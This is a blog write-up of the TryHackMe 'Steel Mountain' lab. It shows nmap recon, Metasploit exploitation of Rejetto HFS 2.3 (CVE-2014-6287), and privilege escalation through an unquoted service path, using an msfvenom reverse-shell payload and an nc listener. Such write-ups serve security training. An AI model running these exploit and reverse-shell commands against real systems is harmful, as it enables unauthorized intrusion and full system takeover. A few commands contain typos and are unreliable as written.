Contrxl’s Substack

Contrxl’s Substack

Share this post

Contrxl’s Substack
Contrxl’s Substack
Steel Mountain - {TryHackMe}
Copy link
Facebook
Email
Notes
More

Steel Mountain - {TryHackMe}

The URL for this room is: https://tryhackme.com/room/steelmountain

Contrxl
Jun 04, 2024

Share this post

Contrxl’s Substack
Contrxl’s Substack
Steel Mountain - {TryHackMe}
Copy link
Facebook
Email
Notes
More
Share

Recon

To begin, run nmap -sC -sV -vv -oN nmap/init [IP_ADDR] to identify any open ports or potentially vulnerable services. This scan reveals a HTTP server running, as well as Samba, NetBIOS and RPC.

Output from an all ports scan from nmap.

The web server that’s running displays an “Employee of the Month” image. Viewing the source of this shows the image title is “BillHarper.png”. Navigating to port 8080, a file server GUI can be found.

File server GUI running on port 8080.

To get more info on this particular file server, select the “HTTPFileServer 2.3” hyperlink to view the documentation. In the documentation, select the “Fork me on Github” link in the top right to identify the type of file server running - Rejetto.

Exploitation

To search for known exploits, use searchsploit rejetto 2.3 or directly search online. The follow is identified via searchsploit.

Terminal output of the searchploit search for Rejetto 2.3.

This particular task works with “Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1)”.

Terminal output of Rejetto HTTP file server exploit.

To run this in Metasploit, execute the following:

msfconsole
search 2014-6287
use
show options

To use the exploit, the following options need to be configured:

  1. RHOSTS: The IP address of the target.

  2. RPORT: 8080, our target is running on this port.

  3. LHOST: IP address of attacker machine.

Once set, use run to launch the exploit and receive a Meterpreter session.

Returned shell from successful exploit.

Privilege Escalation

PowerUp can be used to search for privilege escalation routes on Windows devices. To place this on the target, run upload /path/to/powerup.ps1. Once the upload is complete, run load powershell followed by powershell_shell in the Meterpreter session, this will allow PowerUp to be run.

Terminal output showing commands to run PowerUp.ps1.

This will output a list of services, for this task, focus on services which have “CanRestart” set to “True” and have an unquoted service path containing spaces like the example here where “Path” is set to a location containing spaces and not contained within quotes.

Terminal output of a service with CanRestart as true and an unquoted path.

The application directory for this service is writable, meaning the legitimate app can be swapped for a malicious one. The payload to do this can be created with msfvenom.

msfvenom -p windows/shell_reverse_tcp LHOST=[IP_ADDR] LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

To replace the existing service, execute the following commands:

sc stop AdvancedSystemCareService9
copy ASCService.ee "C:\Program Files (x86)\IObit\AdvancedSystemCare\ASCService.exe"
Terminal output showing the successful copy operation.

Now, start a listener on the attacking machine using nc -nvlp 4443 and reboot the service on the target with sc start AdvancedSystemCare9. This should catch on the listener as root. Navigating to the administrators desktop and reading the file “root.txt” will reveal the flag for this challenge.

More detailed info on commands etc. used here can be found in my GitBook notes below - happy hacking!

GitBook

Thanks for reading Contrxl’s Substack! Subscribe for free to receive new posts and support my work.

Share this post

Contrxl’s Substack
Contrxl’s Substack
Steel Mountain - {TryHackMe}
Copy link
Facebook
Email
Notes
More
Share

Discussion about this post

No posts

Ready for more?

© 2025 Contrxl
Privacy ∙ Terms ∙ Collection notice
Start WritingGet the app
Substack is the home for great culture

Share

Copy link
Facebook
Email
Notes
More